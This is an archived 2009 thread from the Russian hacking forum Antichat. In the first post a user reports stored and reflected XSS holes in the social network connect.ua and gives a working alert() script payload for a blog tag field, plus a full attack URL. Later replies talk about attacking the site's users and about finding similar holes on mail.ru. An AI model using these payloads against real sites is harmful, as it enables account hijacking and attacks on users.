ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Социальные сети
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

connect.ua
  #1  
Старый 14.09.2009, 00:02
_krad_
Новичок
Регистрация: 30.11.2008
Сообщений: 2
Провел на форуме:
45110

Репутация: 5
По умолчанию connect.ua

Активная XSS:
Когда создаем новую запись в блоге, в поле "Мітки" вводим

"><script>alert(123)</script>

Аналогичная пассивная XSS:

http://connect.ua/blogs?index&tag="><script>alert(123)</script>
 
Ответить с цитированием

  #2  
Старый 14.09.2009, 00:06
ligendo
Banned
Регистрация: 05.09.2009
Сообщений: 9
Провел на форуме:
94804

Репутация: 15
По умолчанию

да там их туева хуча
 
Ответить с цитированием

  #3  
Старый 14.09.2009, 00:27
ZnikiR
Участник форума
Регистрация: 14.01.2009
Сообщений: 194
Провел на форуме:
798217

Репутация: 44
Отправить сообщение для ZnikiR с помощью ICQ
По умолчанию

ну и что вы сделатете с этими дырками???
вот такую бы на майл.ру или б на вк,тогда да!

ой извеняюсь,это что ли соц сеть в украине?

Я в шоке дырявый код ппц простоа говрят у них там очень много пользователей около 800 000 !!!
Давайте разденем сайт!!!

Последний раз редактировалось ZnikiR; 14.09.2009 в 00:49..
 
Ответить с цитированием

  #4  
Старый 14.09.2009, 01:24
Enemy_best
Banned
Регистрация: 24.07.2009
Сообщений: 8
Провел на форуме:
135082

Репутация: -29
Отправить сообщение для Enemy_best с помощью ICQ Отправить сообщение для Enemy_best с помощью AIM Отправить сообщение для Enemy_best с помощью Yahoo
По умолчанию

И чё этот скрипт делает?
 
Ответить с цитированием

  #5  
Старый 14.09.2009, 01:39
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме:
7518056

Репутация: 1089


Отправить сообщение для Kusto с помощью ICQ
По умолчанию

не надо было отдельную тему создавать для активок и пассивок есть соответствующие темы, просто в очередной раз с"экономили на кодерах вот и все, а насчет активок зайди в раздел активные XSS там найдеш их кучу на известных сайтах, могу выложить и пассивок на том-же майле- не одну, так мне что отдельную тему создавать?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ